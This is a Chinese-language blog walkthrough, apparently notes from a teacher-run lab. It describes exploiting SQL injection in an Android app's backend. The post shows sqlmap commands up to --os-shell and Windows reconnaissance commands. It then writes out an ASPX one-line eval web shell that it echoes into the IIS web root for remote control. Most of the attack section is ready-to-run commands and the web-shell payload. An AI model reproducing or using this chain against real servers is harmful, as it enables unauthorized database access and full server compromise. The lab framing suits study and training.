vlambda博客
学习文章列表

从apk的SQL注入到获取shell

所有渗透都需获取授权!否则就要承担相应的法律责任。这是一个老师搭的平台,下面是自己做题的一些笔记,一些经验,希望能帮到大家,大佬请绕道忽略。如果有任何歧义全部是本人个人观点,如果有任何错误和遗漏之处,在此抱歉。我只是一个普通的菜鸟。

🔻    安装

拉入模拟器安装

设置burp抓包即可

🔻    查找注入点

 burp在历史记录找到异常点

一直再跳这玩意

 b815c54f68e27a76b7f97113a24540a2  为异常点

我明显没有填写这个 却出现了就很异常(必须小本本记下来)

数据交互处找到注入点

MD5解密后得到文案号

从apk的SQL注入到获取shell

将post包拉入1.txt

从apk的SQL注入到获取shell

 sqlmap一把梭

 python sqlmap.py -r 1.txt

从apk的SQL注入到获取shell

python sqlmap.py -r 1.txt --batch -smart --current-db (获取当前数据库名称)


Batch:会自动选择yes 就不用手动敲y y y了


Smart:启发式快速判断,节约时间

current-db :获取当前数据库名称

从apk的SQL注入到获取shell

python sqlmap.py -r 1.txt --batch -smart --is-dba (查看是否是数据库管理员)

从apk的SQL注入到获取shell

🔻  --os-shell 写入

python sqlmap.py -r 1.txt --batch -smart --os-shell

🔻 小知识

有时会报错 清除缓存就行

从apk的SQL注入到获取shell

sqlmap进行注入时会有缓存记录位置

/root/.local/share/sqlmap/output

删除:rm -rf 文件名

黑客3连

从apk的SQL注入到获取shell
whomai(nt service\mssqlserver)
net localgroup administrators

从apk的SQL注入到获取shell

尝试后发现不能添加用户

🔻 查看网站根目录

dir d:

看来d:\website就是网站根目录

先试试echo能不能用

echo "6666666" > d:\website\777.txt  

发现可以写入

那我们直接写入shell

因为是iis网站 我们就写入aspx一句话

echo "<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>" > d:\website\adt888.aspx

直接上冰蟹

到此结束成功获取shell